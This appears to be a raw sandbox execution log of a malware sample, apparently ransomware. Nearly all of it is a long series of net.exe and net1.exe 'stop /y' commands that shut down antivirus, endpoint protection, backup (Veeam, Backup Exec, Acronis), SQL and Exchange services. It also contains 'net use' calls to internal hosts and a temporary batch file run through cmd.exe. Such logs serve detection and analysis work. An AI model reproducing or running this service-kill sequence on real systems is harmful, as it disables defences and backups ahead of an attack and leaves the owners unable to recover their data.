C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$SYSTEM_BGC /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop svcGenericHost /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$SQLEXPRESS /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$SOPHOS /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$SQL_2008 /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop sophossps /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$SHAREPOINT /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SntpService /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$SBSMONITORING /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SmcService /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$PROFXENGAGEMENT /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop Smcinst /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$PROD /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ShMonitor /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$PRACTTICEMGT /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SepMasterService /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$PRACTTICEBGC /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SAVService /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$ECWDB2 /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SAVAdminService /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$CXDB /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop sacsvr /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$CITRIX_METAFRAME /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$SOPHOS /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$BKUPEXEC /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop sms_site_sql_backup /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop mfevtp /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop RESvc /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop wbengine /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop mfemms /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ReportServer$SQL_2008 /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop wbengine /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop mfefire /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop OracleClientCache80 /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamTransportSvc /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop McTaskManager /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MySQL80 /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamRESTSvc /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop McShield /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MySQL57 /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamNFSSvc /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop McAfeeFrameworkMcAfeeFramework /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQLServerOLAPService /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamMountSvc /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop McAfeeFramework /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQLServerADHelper100 /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamHvIntegrationSvc /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop McAfeeEngineService /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQLServerADHelper /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamEnterpriseManagerSvc /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MBEndpointAgent /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQLSERVER /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamDeploySvc /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MBAMService /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQLFDLauncher$TPSAMA /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamDeploymentService /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop masvc /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQLFDLauncher$TPS /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamCloudSvc /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop macmnsvc /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamCatalogSvc /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop klnagent /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQLFDLauncher$SQL_2008 /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamBrokerSvc /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop kavfsslp /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQLFDLauncher$SHAREPOINT /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamBackupSvc /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop KAVFSGT /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQLFDLauncher$SBSMONITORING /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLWriter /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop KAVFS /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$VEEAMSQL2008R2 /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop FA_Scheduler /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$VEEAMSQL2012 /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SDRSVC /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ESHASRV /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$VEEAMSQL2008R2 /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop PDVFSService /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop EsgShKernel /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$TPSAMA /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ntrtscan /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop EPUpdateService /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$TPS /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$VEEAMSQL2008R2 /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop EPSecurityService /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop NetMsmqActivator /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MsDtsServer100 /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “SQL Backups /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Enterprise Client Service” /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop EraserSvc11710 /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Sophos Agent” /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSExchangeES /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop IISAdmin /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MsDtsServer /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Acronis VSS Provider” /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop sophos /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop CAARCUpdateSvc /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop CASAD2DWebSvc /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop AcrSch2Svc /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecRPCService /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecManagementService /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecJobEngine /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecDiveciMediaService /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecAgentBrowser /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecAgentAccelerator /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecVSSProvider /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop PDVFSService /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop veeam /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamNFSSvc /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamDeploymentService /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamTransportSvc /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VSNAPVSS /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop QBIDPService /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop QBFCService /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop RTVscan /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SavRoam /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ccEvtMgr /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MMS /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop EhttpSrv /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop Intuit.QuickBooks.FCS /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop bedbg /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop NetBackup BMR MTFTP Service /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BMR Boot Service /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop McAfeeDLPAgentService /y2⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.842⤵
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.872⤵
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp9C9E.bat2⤵
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeDLPAgentService /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BMR Boot Service /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop bedbg /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y1⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s upnphost1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop CAARCUpdateSvc /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop YooIT /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SntpService /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Clean Service” /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$CXDB /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop UI0Detect /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$ECWDB2 /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Message Router” /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamCatalogSvc /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Web Control Service” /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop Antivirus /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop audioendpointbuilder /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SBSMONITORING /1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLBrowser /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ShMonitor /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop DCAgent /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop YooBackup /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamDeploySvc /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Veeam Backup Catalog Data Service” /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SOPHOS /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “SQLsafe Backup Service” /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MsDtsServer110 /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SAVAdminService /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AVP /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecDeviceMediaService /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop stc_raw_agent /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SOPHOS /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MySQL80 /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SamSs /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SepMasterService /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McShield /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Health Service” /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sophossps /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamBackupSvc /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$TPSAMA /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos File Scanner Service” /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop W3Svc /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamMountSvc /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop svcGenericHost /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos MCS Agent” /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TmCCSF /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SAVService /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop vapiendpoint /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop msexchangeadtopology /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Zoolz 2 Service” /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos MCS Client” /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MBAMService /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_update /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLSERVERAGENT /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$TPSAMA /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop POP3Svc /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PROD /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamRESTSvc /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLSafeOLRService /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Device Control Service” /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TrueKeyScheduler /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PROD /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_service /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$TPS /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SDRSVC /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop wbengine /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TrueKey /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop WRSVC /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SmcService /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “intel(r) proset monitoring service” /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McTaskManager /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop masvc /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$SQL_2008 /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop RESvc /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop msexchangeimap4 /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mozyprobackup /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop KAVFS /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop kavfsslp /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$SQL_2008 /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeSA /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLSERVER /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MBEndpointAgent /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLTELEMETRY /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$TPS /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_update_64 /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeFramework /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeSRS /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Safestore Service” /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop KAVFSGT /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EPUpdateService /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ntrtscan /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ESHASRV /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop klnagent /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLWriter /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “aphidmonitorservice” /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MySQL57 /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop Smcinst /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TrueKeyServiceHelper /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop wbengine /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_filter /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$TPS /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeMGMT /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfefire /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EPSecurityService /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$TPSAMA /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop PDVFSService /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EsgShKernel /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sacsvr /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sms_site_sql_backup /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ARSM /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop zhudongfangyu /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop CASAD2DWebSvc /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecDiveciMediaService /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop PDVFSService /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamBrokerSvc /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$TPSAMA /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamCloudSvc /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop unistoresvc_1af40a /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop macmnsvc /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeMTA /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$TPS /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “SQLsafe Filter Service” /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLServerOLAPService /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop msftesql$PROD /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SMTPSvc /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop FA_Scheduler /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfemms /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper100 /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop tmlisten /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SstpSvc /y1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y1⤵
-
